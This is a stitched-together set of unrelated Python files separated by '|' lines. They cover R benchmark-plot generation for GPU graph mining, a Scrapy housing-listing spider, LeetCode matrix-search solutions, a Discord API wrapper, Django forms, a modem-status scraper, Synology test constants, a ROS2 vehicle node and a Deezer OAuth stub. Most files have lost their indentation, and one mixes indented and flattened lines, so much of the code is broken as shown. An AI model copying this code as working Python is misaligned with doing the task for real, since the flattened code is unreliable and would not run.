#f.write("plot(data$speedup_"+v+", type=\"o\", lwd=3.0, col=\"blue\", ylim=c(0,max(data$speedup_"+v+")+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
#f.write("title(main=\"Seq vs GPU graph mining\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
f.write("axis(4, col.lab=rgb(0,0.5,0), cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, col=rgb(0,0.5,0), cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
#f.write("), cex=3, fill=plot_colors, horiz=TRUE) \n")
f.write("), cex=2.5, inset=c(0.1,0), fill=plot_colors, bty=\"n\") \n")
elif filltype == "pattern":
f.write("plot(data$speedup_"+par_versions[0]+", pch="+str(marker[0])+", type=\"b\", lty=1, lwd=3.0, ylim=c(0,max_y+3), cex=3.5, axes=FALSE, ann=FALSE)\n")
for i in range(1,len(par_versions)):
f.write("lines(data$speedup_"+par_versions[i]+", pch="+str(marker[i])+", type=\"b\", lty=1, lwd=3.0, cex=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, cex.lab=3.25) \n")
f.write("axis(4, cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, cex=3.25 ) \n")
for v in par_versions:
f.write("plot_density <- append(plot_density, NA) \n")
f.write("plot_angle <- append(plot_angle, NA) \n")
f.write("plot_markers <- c(NA")
for i in range(len(par_versions)):
f.write(", NA")
for i in range(len(par_versions)):
f.write(", "+str(marker[i]))
f.write(") \n")
f.write("legend(\"top\",c(\"seq\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
f.write("), cex=2.5, inset=c(0.1,0), density=plot_density, angle=plot_angle, pch=plot_markers, bty=\"n\") \n")
else:
print "wrong filltype"
sys.exit()
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
def do_bar_plot_par_versions(supports,par_times, outfile):
cuda_versions = dict()
cuda_versions["gspan_cuda_no_sort"] = "single-ext"
cuda_versions["gspan_cuda_no_sort_block"] = "single-seg"
cuda_versions["gspan_cuda_mult_block"] = "multiple-seg"
support = []
for k in supports.keys():
support = supports[k] # get any of the support lists
break
support = sorted(support)
f = open(infile+"_par_versions.dat","w")
f.write("support")
for ver in cuda_versions.keys():
f.write("\t"+ver)
f.write("\n")
versions_list = ""
comma_flag = False
for ver in cuda_versions.keys():
if comma_flag == True:
versions_list += ","
versions_list += "\""+ cuda_versions[ver] +"\""
comma_flag = True
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K")
elif labels_as_K == "YI":
f.write(str(s/1000)+"K")
else:
f.write(str(s))
for ver in cuda_versions.keys():
f.write("\t"+str(par_times[ver][str(s)]))
f.write("\n")
f.close()
max_y = 0
for p in cuda_versions.keys():
y = max([v for (k,v) in par_times[p].items()] )
if y > max_y:
max_y = y
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_par_versions.dat\", header=T, sep=\"\\t\") \n")
#f.write("max_y <- max(data$seq,data$par) \n")
f.write("max_y <- "+str(max_y)+"\n")
f.write("plot_colors <- c(\"red\",\"green\",\"blue\")\n")
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
f.write("barplot(t(as.matrix(data[,2:4])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
f.write("par(new=TRUE) \n")
f.write("title(main=\"GPU times ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3, font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
#f.write("legend(\"topright\", substring(rownames(t(data))[2:4],12), cex=2, fill=plot_colors) \n")
f.write("legend(\"topright\",c("+ versions_list +"), cex=3, fill=plot_colors, bty=\"n\") \n")
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
if __name__== "__main__":
#filltype = "color"
filltype = "pattern"
# seq vs one par version
for ver in support_all:
do_bar_plot_seq_vs_par(support_all[ver],seq_time_all[ver],par_time_all[ver],outfile+"_seq_vs_"+ver,filltype, ver)
#seq vs multiple par version
#par_versions = ["gspan_cuda", "gspan_cuda_lists", "gspan_cuda_no_sort_block"]
par_versions = ["gspan_cuda_lists", "gspan_cuda_no_sort_block"]
par_labels = { "gspan_cuda_no_sort_block":"single-seg" , "gspan_cuda_lists":"tid-list", "gspan_cuda":"dfs-sort"}
do_bar_plot_seq_vs_par2(support_all, seq_time_all["gspan_cuda_no_sort_block"], par_time_all, par_versions, par_labels, outfile+"_seq_vs_par",filltype)
#par versions
do_bar_plot_par_versions(support_all,par_time_all,outfile+"_par_versions")
|
# -*- coding: utf-8 -*-
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import Selector
from ganjiScrapySpider.items import HouseItem
class GanjiSpider(CrawlSpider):
name="ganjiSpider"
allowed_domains=['ganji.com']
start_urls=['http://bj.ganji.com/fang1/o1']
rules=[
Rule(SgmlLinkExtractor(allow=('http://bj.ganji.com/fang1/o'),restrict_xpaths=('//a[@class="next"]')),
callback='parse_item',
follow=True)
]
def parse_start_url(self,response):
return self.parse_item(response)
def parse_item(self,response):
sel=Selector(response)
houses=sel.xpath('//li[@class="list-img clearfix"]')
houseItems=[]
for house in houses:
hItem=HouseItem()
hItem['title']=house.select('div[@class="list-mod4"]/div[@class="info-title"]/a/text()').extract()[0].strip()
hItem['community']=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/div[@class="list-word"]/span[@class="list-word-col"]/a/text()').extract()[0].strip()
hItem['price']=house.select('div[@class="list-mod4"]/div[@class="list-mod3 clearfix"]/p[@class="list-part"]/em[@class="sale-price"]/text()').extract()[0].strip()
hItem['area']=house.select('div[@class="list-mod4"]/div[@class="list-mod3 clearfix"]/p[@class="list-part"][2]/text()').extract()[0].strip()
houseType=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/p[@class="list-word"]/span[@class="js-huxing"]/text()').extract()
if len(houseType)==0:
hItem['houseType']=''
else:
hItem['houseType']=houseType[0]
infos=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/p[@class="list-word"]/text()').extract()
hItem['layer']=infos[1]
hItem['direction']=infos[2]
houseItems.append(hItem)
return houseItems
|
# V0
# IDEA : MATRIX IN ORDER + BRUTE FORCE
# Space: O(1)
# Time: O(m+n) # worst case
class Solution:
def searchMatrix(self, matrix, target):
if len(matrix) == 0:
return False
row, col = 0, len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] == target:
return True
elif matrix[row][col] < target:
row += 1
elif matrix[row][col] > target:
col -= 1
return False
# V0'
# IDEA : BINARY SEARCH
# Space: O(1)
# Time: O(logm + logn)
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix:
return False
m, n = len(matrix), len(matrix[0])
left, right = 0, m * n
while left < right:
            mid = left + (right - left) // 2
            if matrix[mid // n][mid % n] >= target:
                right = mid
            else:
                left = mid + 1
        return left < m * n and matrix[left // n][left % n] == target
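# For example, with n = 4 columns the flattened index mid = 6 maps to
# row = 6 // 4 = 1 and col = 6 % 4 = 2, i.e. matrix[1][2]; this is how the
# 1-D binary-search position is translated back into 2-D coordinates.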
# V1
# https://leetcode.com/problems/search-a-2d-matrix/discuss/351404/Python-Simple-Solution
class Solution:
def searchMatrix(self, matrix, target):
if len(matrix) == 0:
return False
row, col = 0, len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] == target: return True
elif matrix[row][col] < target: row += 1
elif matrix[row][col] > target: col -= 1
return False
### Test case
s=Solution()
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 9) == True
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 1) == True
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 99) == False
assert s.searchMatrix([[]], 0) == False
assert s.searchMatrix([[]], 100) == False
assert s.searchMatrix([], 100) == False
assert s.searchMatrix([[-1,3,4,-4]], -1) == False
assert s.searchMatrix([[_ for _ in range(3)] for _ in range(4)], -1) == False
assert s.searchMatrix([[_ for _ in range(3)] for _ in range(4)], 2) == True
assert s.searchMatrix([[_ for _ in range(99)] for _ in range(999)], 2) == True
# V1'
# https://leetcode.com/problems/search-a-2d-matrix/discuss/592696/python-super-easy
# IDEA : BRUTE FORCE
from typing import List

class Solution:
    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
for x in matrix:
if target in x:
return True
return False
# V1''
# https://blog.csdn.net/fuxuemingzhu/article/details/79459314
# https://blog.csdn.net/fuxuemingzhu/article/details/79459200
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0]:
return False
rows = len(matrix)
cols = len(matrix[0])
row, col = 0, cols - 1
while True:
if row < rows and col >= 0:
if matrix[row][col] == target:
return True
elif matrix[row][col] < target:
row += 1
else:
col -= 1
else:
return False
# V1'
# https://blog.csdn.net/fuxuemingzhu/article/details/79459314
# https://blog.csdn.net/fuxuemingzhu/article/details/79459200
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
return any(target in row for row in matrix)
# V2
# IDEA : BINARY SEARCH
# Space: O(1)
# Time: O(logm + logn)
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix:
return False
m, n = len(matrix), len(matrix[0])
left, right = 0, m * n
while left < right:
            mid = left + (right - left) // 2
            if matrix[mid // n][mid % n] >= target:
                right = mid
            else:
                left = mid + 1
        return left < m * n and matrix[left // n][left % n] == target
|
from globvar import *
from discordapi import *
def sendMessage(content, channelID, embed=None):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
Possible embed categories: title, description, url, timestamp, color, footer,
image, thumbnail, video, provider, fields.
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Content-Type": "application/json", "Authorization" : token}
data = {"content" : content, "embed" : embed}
r = requests.post(url, headers=header, data=json.dumps(data))
return r.text
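# Example usage (assumes globvar provides apiBase and token; the channel ID and
# embed below are placeholders, not values from this project):
#   embed = {"title": "Status", "description": "All systems nominal", "color": 0x00FF00}
#   sendMessage("Daily report", "123456789012345678", embed=embed)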
def editMessage(content, channelID, messageID):
url = apiBase + "/channels/" + channelID + "/messages/" + messageID
header = {"Content-Type": "application/json", "Authorization" : token}
data = {"content" : content}
r = requests.patch(url, headers=header, data=json.dumps(data))
return r.text
def getGuildID(channelID):
url = apiBase + "/channels/" + channelID
header = {"Content-Type": "application/json", "Authorization" : token}
r = requests.get(url, headers=header)
return json.loads(r.text)['guild_id']
def getPreviousMessage(channelID, messageID):
"""
Get the most recent message sent in a channel.
uses globvar: apiBase, token
content: string
token: string
channelID: string
messageID: string
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
param = {"before" : messageID, "limit" : 1}
r = requests.get(url, headers=header, params=param)
return r.text
def addReaction(reaction, channelID, messageID):
"""
PUT/channels/{channel.id}/messages/{message.id}/reactions/{emoji}/@me
Add one reaction to a message.
reaction: emoji string.
"""
url = apiBase + "/channels/" + channelID + "/messages/" + messageID + "/reactions/" + reaction + "/@me" # %F0%9F%91%8C%F0%9F%8F%BD
header = {"Authorization" : token}
r = requests.put(url, headers=header)
return r.text
def changeUsername(content, channelID):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
data = {"content" : content}
r = requests.post(url, headers=header, data=data)
return r.text
def deleteMessage(channelID, messageID):
"""
Sends a message to the specified channel
uses globvar: apiBase, token
content: string
token: string
channelID: string
"""
url = apiBase + "/channels/" + channelID + "/messages/" + messageID
header = {"Authorization" : token}
r = requests.delete(url, headers=header)
return r.text
def getMessageJson(channelID):
"""
Get all the messages from the specified channelID in a json
uses globvar: apiBase, token
channelID: string
username: string - optional - Used to find message only from that user. Username is case sensitive.
Returns a list of message informations
"""
url = apiBase + "/channels/" + channelID + "/messages"
header = {"Authorization" : token}
messageList = []
before = None # Parameter used to get messages beyond the limit.
counter = 0
while True:
counter += 1
params = {"limit" : 100, "before" : before}
r = requests.get(url, headers=header, params=params)
if r.status_code == 429:
print(r.text)
print("ERROR ERROR ERROR ERROR ERROR ERROR")
return "ERROR"
receiveList = json.loads(r.text)
if len(receiveList) == 0 or counter == 10: # If we ran out of messages.
return messageList
messageList += receiveList
before = receiveList[len(receiveList)-1]['id']
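# Example (the channel ID below is a placeholder): fetch up to 1000 recent
# messages from a channel and count them.
#   history = getMessageJson("123456789012345678")
#   print(len(history))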
|
"""
This file contain form class that get the user input from template to views.
"""
from django import forms
from django.contrib.auth.models import User
from .models import Profile
class ProfileUpdateForm(forms.ModelForm):
"""Form in user's settings page to update image of that user."""
profile_picture = forms.ImageField(required=False, label='Profile Picture')
cover_image = forms.ImageField(required=False, label='Cover Image')
class Meta:
"""Create field that contain profile picture & cover image."""
model = Profile
fields = ['profile_picture', 'cover_image']
class UserUpdateForm(forms.ModelForm):
"""Form in user's settings page to update value in default Django User model."""
email = forms.EmailField(required=False, label='Email')
username = forms.CharField(required=True, label='Username')
class Meta:
"""Create field that contain username & email."""
model = User
fields = ['username', 'email']
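# A minimal sketch of how these forms might be combined in a settings view.
# The view name and the `request.user.profile` relation are assumptions for
# illustration, not part of this module:
#
#   def settings_view(request):
#       u_form = UserUpdateForm(request.POST or None, instance=request.user)
#       p_form = ProfileUpdateForm(request.POST or None, request.FILES or None,
#                                  instance=request.user.profile)
#       if request.method == 'POST' and u_form.is_valid() and p_form.is_valid():
#           u_form.save()
#           p_form.save()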
|
# Run with:
# python -m rl_games.games.dqn.nac.profile
from typing import Sequence, Tuple
import cProfile
import pstats
import io
from pstats import SortKey
from rl_games.dqn.dqn_player import DqnPlayer
from rl_games.core.play import play_many
from rl_games.core.player import Player
from rl_games.core.game import Game
from rl_games.games.nac import Nac, NacState, NacAction
from rl_games.games.dqn.nac.setup import NacDqnSetup
def get_sample_game_and_trained_players(num_rounds: int = 50, initial_explore_chance: float = 0.25) -> Tuple[Game, Sequence[Player]]:
game = Nac()
players = [
DqnPlayer[NacState, NacAction](game.markers[0], NacDqnSetup(), explore_chance=initial_explore_chance),
DqnPlayer[NacState, NacAction](game.markers[1], NacDqnSetup(), explore_chance=initial_explore_chance),
]
play_many(game, players, range(num_rounds), reduce_explore_chance=True)
return game, players
if __name__ == '__main__':
with cProfile.Profile() as profile:
get_sample_game_and_trained_players()
s = io.StringIO()
sortby = SortKey.CUMULATIVE
ps = pstats.Stats(profile, stream=s).sort_stats(sortby)
ps.print_stats()
print(s.getvalue())
|
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Any, Generator
class AbstractUnitOfWork(ABC):
def __enter__(self) -> AbstractUnitOfWork:
return self
def __exit__(self, *args: Any) -> None:
self.rollback()
def commit(self) -> None:
self._commit()
def rollback(self) -> None:
return self._rollback()
@abstractmethod
def _commit(self) -> None:
raise NotImplementedError
@abstractmethod
def _rollback(self) -> None:
raise NotImplementedError
@abstractmethod
def execute_native_statement(self, statement: str, **params: Any) -> Any:
raise NotImplementedError
@abstractmethod
def collect_new_events(self) -> Generator:
raise NotImplementedError
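# A minimal sketch of a concrete implementation (not part of the original
# module): an in-memory unit of work that only records whether commit or
# rollback was called. All names below are illustrative.
class InMemoryUnitOfWork(AbstractUnitOfWork):
    def __init__(self) -> None:
        self.committed = False
        self.rolled_back = False
        self._events: list = []

    def _commit(self) -> None:
        self.committed = True

    def _rollback(self) -> None:
        self.rolled_back = True

    def execute_native_statement(self, statement: str, **params: Any) -> Any:
        # No real database here; echo the statement and its parameters back.
        return statement, params

    def collect_new_events(self) -> Generator:
        # Drain any queued domain events.
        while self._events:
            yield self._events.pop(0)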
|
from bs4 import BeautifulSoup
import requests
import config
import time
import mysql.connector
def main():
status_URL = 'http://192.168.100.1/RgConnect.asp'
# log_URL = ''
soup = getSoup(status_URL)
ds_levels, us_levels = getStatus(soup)
insert_into_db('downstream', ds_levels)
insert_into_db('upstream', us_levels)
def getSoup(url):
page = requests.get(url)
soup = BeautifulSoup(page.text, features='html.parser')
return soup
def getStatus(soup):
tables = soup.findAll('table')
downstream_table = tables[2].findAll('tr')[2:]
upstream_table = tables[3].findAll('tr')[2:]
now = int(time.time())
downstream_info = []
for row in downstream_table:
cols = row.findAll('td')
status = cols[1].string.strip()
channel = int(cols[0].string)
frequency = int(cols[4].string[:-4])/1000000
power = float(cols[5].string[:-5])
snr = float(cols[6].string[:-3])
corrected = int(cols[7].string)
uncorrected = int(cols[8].string)
if status == "Locked":
channel_info = { 'id': myHash(now, channel),
'timestamp': now,
'frequency': frequency,
'power': power,
'snr': snr,
'corrected': corrected,
'uncorrected': uncorrected
}
downstream_info.append(channel_info)
upstream_info = []
for row in upstream_table:
cols = row.findAll('td')
status = cols[1].string.strip()
channel = int(cols[0].string)
frequency = float(cols[5].string[:-4])/1000000
power = float(cols[6].string[:-5])
if status == "Locked":
channel_info = { 'id': myHash(now, channel),
'timestamp': now,
'frequency': frequency,
'power': power
}
upstream_info.append(channel_info)
return (downstream_info, upstream_info)
def myHash(timestamp, channel):
ch = str(channel)
if len(ch) < 2:
ch = '0' + ch
key = str(timestamp) + ch
return int(key)
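# For example, myHash(1700000000, 7) zero-pads the channel to "07" and returns
# the integer 170000000007 (timestamp digits followed by the two-digit channel),
# giving each (timestamp, channel) pair a unique row id.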
def insert_into_db(table, data):
conn = mysql.connector.connect(**config.mysql)
cursor = conn.cursor()
for entry in data:
placeholders = ', '.join(['%s'] * len(entry))
cols = ', '.join(entry.keys())
sql = f"INSERT INTO {table} ({cols}) VALUES ({placeholders})"
print(sql)
print(entry.values())
try:
cursor.execute(sql, list(entry.values()))
except mysql.connector.Error as err:
print(f"ERROR: {err}")
else:
print("SUCCESS!!")
conn.commit()
cursor.close()
conn.close()
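# For a downstream row the generated statement looks like the following, with
# the values bound separately by the connector:
#   INSERT INTO downstream (id, timestamp, frequency, power, snr, corrected, uncorrected)
#   VALUES (%s, %s, %s, %s, %s, %s, %s)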
if __name__ == "__main__":
main()
|
"""DSM 6 datas."""
from .const_6_api_auth import DSM_6_AUTH_LOGIN
from .const_6_api_auth import DSM_6_AUTH_LOGIN_2SA
from .const_6_api_auth import DSM_6_AUTH_LOGIN_2SA_OTP
from .const_6_api_info import DSM_6_API_INFO
from .core.const_6_core_security import DSM_6_CORE_SECURITY
from .core.const_6_core_security import DSM_6_CORE_SECURITY_UPDATE_OUTOFDATE
from .core.const_6_core_share import DSM_6_CORE_SHARE
from .core.const_6_core_system import DSM_6_CORE_SYSTEM_DS218_PLAY
from .core.const_6_core_system import DSM_6_CORE_SYSTEM_DS918_PLUS
from .core.const_6_core_upgrade import DSM_6_CORE_UPGRADE_FALSE
from .core.const_6_core_upgrade import DSM_6_CORE_UPGRADE_TRUE
from .core.const_6_core_utilization import DSM_6_CORE_UTILIZATION
from .core.const_6_core_utilization import DSM_6_CORE_UTILIZATION_ERROR_1055
from .download_station.const_6_download_station_info import (
DSM_6_DOWNLOAD_STATION_INFO_CONFIG,
)
from .download_station.const_6_download_station_info import (
DSM_6_DOWNLOAD_STATION_INFO_INFO,
)
from .download_station.const_6_download_station_stat import (
DSM_6_DOWNLOAD_STATION_STAT_INFO,
)
from .download_station.const_6_download_station_task import (
DSM_6_DOWNLOAD_STATION_TASK_LIST,
)
from .dsm.const_6_dsm_info import DSM_6_DSM_INFORMATION
from .dsm.const_6_dsm_network import DSM_6_DSM_NETWORK_2LAN_1PPPOE
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS1515_PLUS_SHR2_10DISKS_1VOL_WITH_EXPANSION,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS1819_PLUS_SHR2_8DISKS_1VOL,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS213_PLUS_SHR1_2DISKS_2VOLS,
)
from .storage.const_6_storage_storage import (
DSM_6_STORAGE_STORAGE_DS918_PLUS_RAID5_3DISKS_1VOL,
)
from .surveillance_station.const_6_api_info import (
DSM_6_API_INFO as DSM_6_API_INFO_SURVEILLANCE_STATION,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MD_PARAM_SAVE,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MOTION_ENUM,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_GET_LIVE_VIEW_PATH,
)
from .surveillance_station.const_6_surveillance_station_camera import (
DSM_6_SURVEILLANCE_STATION_CAMERA_LIST,
)
from .surveillance_station.const_6_surveillance_station_home_mode import (
DSM_6_SURVEILLANCE_STATION_HOME_MODE_GET_INFO,
)
from .surveillance_station.const_6_surveillance_station_home_mode import (
DSM_6_SURVEILLANCE_STATION_HOME_MODE_SWITCH,
)
__all__ = [
"DSM_6_AUTH_LOGIN",
"DSM_6_AUTH_LOGIN_2SA",
"DSM_6_AUTH_LOGIN_2SA_OTP",
"DSM_6_API_INFO",
"DSM_6_CORE_SECURITY",
"DSM_6_CORE_SECURITY_UPDATE_OUTOFDATE",
"DSM_6_CORE_SHARE",
"DSM_6_CORE_SYSTEM_DS218_PLAY",
"DSM_6_CORE_SYSTEM_DS918_PLUS",
"DSM_6_CORE_UPGRADE_FALSE",
"DSM_6_CORE_UPGRADE_TRUE",
"DSM_6_CORE_UTILIZATION",
"DSM_6_CORE_UTILIZATION_ERROR_1055",
"DSM_6_DOWNLOAD_STATION_INFO_CONFIG",
"DSM_6_DOWNLOAD_STATION_INFO_INFO",
"DSM_6_DOWNLOAD_STATION_STAT_INFO",
"DSM_6_DOWNLOAD_STATION_TASK_LIST",
"DSM_6_DSM_INFORMATION",
"DSM_6_DSM_NETWORK_2LAN_1PPPOE",
"DSM_6_STORAGE_STORAGE_DS1515_PLUS_SHR2_10DISKS_1VOL_WITH_EXPANSION",
"DSM_6_STORAGE_STORAGE_DS1819_PLUS_SHR2_8DISKS_1VOL",
"DSM_6_STORAGE_STORAGE_DS213_PLUS_SHR1_2DISKS_2VOLS",
"DSM_6_STORAGE_STORAGE_DS918_PLUS_RAID5_3DISKS_1VOL",
"DSM_6_API_INFO_SURVEILLANCE_STATION",
"DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MD_PARAM_SAVE",
"DSM_6_SURVEILLANCE_STATION_CAMERA_EVENT_MOTION_ENUM",
"DSM_6_SURVEILLANCE_STATION_CAMERA_GET_LIVE_VIEW_PATH",
"DSM_6_SURVEILLANCE_STATION_CAMERA_LIST",
"DSM_6_SURVEILLANCE_STATION_HOME_MODE_GET_INFO",
"DSM_6_SURVEILLANCE_STATION_HOME_MODE_SWITCH",
]
|
# ROS2 libraries
import rclpy
from rclpy.node import Node
# ROS2 messages
from carla_intersection_msgs.msg import Request, Grant, VehicleCommand
from geometry_msgs.msg import Vector3
# Other libraries
from src.utils import make_coordinate, ROSClock
from src.ros_utils import make_Vector3
from src.vehicle import Vehicle
# Constants
from src.constants import BILLION
class VehicleNode(Node):
def __init__(self):
super().__init__(f"vehicle")
# Parameters declaration
self.declare_parameter('vehicle_id', 0)
self.declare_parameter('initial_velocity', [0.0, 0.0, 0.0])
self.declare_parameter('initial_position', [0.0, 0.0, 0.0])
# State variables initialization
self.vehicle_id = self.get_parameter('vehicle_id').value
self.initial_position = make_coordinate(self.get_parameter('initial_position').value)
self.initial_velocity = make_coordinate(self.get_parameter('initial_velocity').value)
self.asking_for_grant = False
self.vehicle = Vehicle(vehicle_id = self.vehicle_id,
initial_position = self.initial_position,
initial_velocity = self.initial_velocity,
clock = ROSClock(self.get_clock()),
logger = self.get_logger())
# pubsub for input output ports
self.velocity_ = self.create_subscription(Vector3, f"vehicle_velocity_{self.vehicle_id}", self.velocity_callback, 10)
self.position_ = self.create_subscription(Vector3, f"vehicle_position_{self.vehicle_id}", self.position_callback, 10)
self.control_ = self.create_publisher(VehicleCommand, f"control_to_command_{self.vehicle_id}", 10)
self.grant_ = self.create_subscription(Grant, "grant", self.grant_callback, 10)
self.request_ = self.create_publisher(Request, "request", 10)
def position_callback(self, new_position):
self.vehicle.set_position(new_position)
def velocity_callback(self, new_velocity):
pub_packets = self.vehicle.receive_velocity_from_simulator(new_velocity)
        if pub_packets.cmd is not None:
cmd = VehicleCommand()
cmd.throttle = pub_packets.cmd.throttle
cmd.brake = pub_packets.cmd.brake
self.control_.publish(cmd)
        if pub_packets.request is not None and not self.asking_for_grant:
request = Request()
request.requestor_id = self.vehicle_id
request.speed = pub_packets.request.speed
request.position = make_Vector3(pub_packets.request.position)
self.request_.publish(request)
self.asking_for_grant = True
def grant_callback(self, grant):
if grant.requestor_id != self.vehicle_id:
return
self.vehicle.grant(grant.arrival_time, grant.intersection_position)
self.asking_for_grant = False
def main(args=None):
rclpy.init(args=args)
ego_vehicle = VehicleNode()
rclpy.spin(ego_vehicle)
# Destroy the node explicitly
ego_vehicle.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
# http://python-social-auth.readthedocs.org/
# https://github.com/python-social-auth/social-examples
from social_core.backends.deezer import DeezerOAuth2
from social_core.backends.utils import load_backends
from configparser import ConfigParser
import re
from social_core.backends.oauth import OAuthAuth
# NAME_RE = re.compile(r'([^O])Auth')
DEEZER_BACKEND_CONFIG = 'social_core.backends.deezer.DeezerOAuth2'
parser = ConfigParser()
parser.read('../config/deezer.ini')
API_KEY = parser.get('DEFAULT', 'apikey')
API_SECRET = parser.get('DEFAULT', 'apisecret')
USERNAME = parser.get('DEFAULT', 'username')
class ConnectDeezer:
def try_to_connect(self):
DeezerOAuth2.start()
pass
# class AppBaseView():
# def render_home(self, **extra):
# context = common_context(
# DEEZER_BACKEND_CONFIG,
# load_strategy(),
# user=self.get_current_user(),
# plus_id=API_KEY,
# **extra
# )
# # return render.home(**context)
#
# def is_authenticated(user):
# if callable(user.is_authenticated):
# return user.is_authenticated()
# else:
# return user.is_authenticated
#
# def associations(user, strategy):
# user_associations = strategy.storage.user.get_social_auth_for_user(user)
# if hasattr(user_associations, 'all'):
# user_associations = user_associations.all()
# return list(user_associations)
#
# def common_context(authentication_backends, strategy, user=None, **extra):
# """Common view context"""
# context = {
# 'user': user,
# 'available_backends': load_backends(authentication_backends),
# 'associated': {}
# }
#
# if user and is_authenticated(user):
# context['associated'] = dict((association.provider, association)
# for association in associations(user, strategy))
#
# return dict(context, **extra)
if __name__ == '__main__':
    ConnectDeezer().try_to_connect()
|
# TODO: shadow `crowsetta` here?
|
# import pypboy
# import settings
# import pygame
# import os
# import imp
# import glob
# import time
# import game
# from collections import deque
# import mutagen
# import random
# import configparser
# import sys
# import threading
#
# from pypboy.modules.data import entities
# import pypboy.data
#
# song = None
# start_pos = 0
# waveform = []
#
# class Module(pypboy.SubModule):
# label = "RADIO"
#
# def __init__(self, *args, **kwargs):
# super(Module, self).__init__(*args, **kwargs)
#
# self.audiofolders = 'sounds/radio/'
# self.stations = []
# self.station_menu = []
# self.station_list = []
# self.station_waveforms = []
# self.station_list = self.get_station_data()
# self.total_length = 0
# self.station_meta_data_file = None
# self.station_files = []
# self.station_lengths = []
#
# self.grid = Grid()
# self.grid.rect[0] = 400
# self.grid.rect[1] = 180
# self.add(self.grid)
#
# self.animation = Animation()
# self.animation.rect[0] = 400
# self.animation.rect[1] = 190
# self.add(self.animation)
#
# for station in self.station_list:
# # station_data = [station_name, folder, station_files, station_ordered, station_lengths, total_length]
# station_folder = station[1] + "/"
# station_name = station[0]
# self.station_menu.append([station_name])
# self.stations.append(RadioClass(station_name, station_folder, station))
#
# for station in self.stations:
# self.add(station)
# self.active_station = None
# settings.radio = self
#
# stationCallbacks = []
# for i, station in enumerate(self.stations):
# stationCallbacks.append(lambda i=i: self.select_station(i))
#
# # print ("station labels = ",stationLabels)
# # print ("station callbacks = ",stationCallbacks)
#
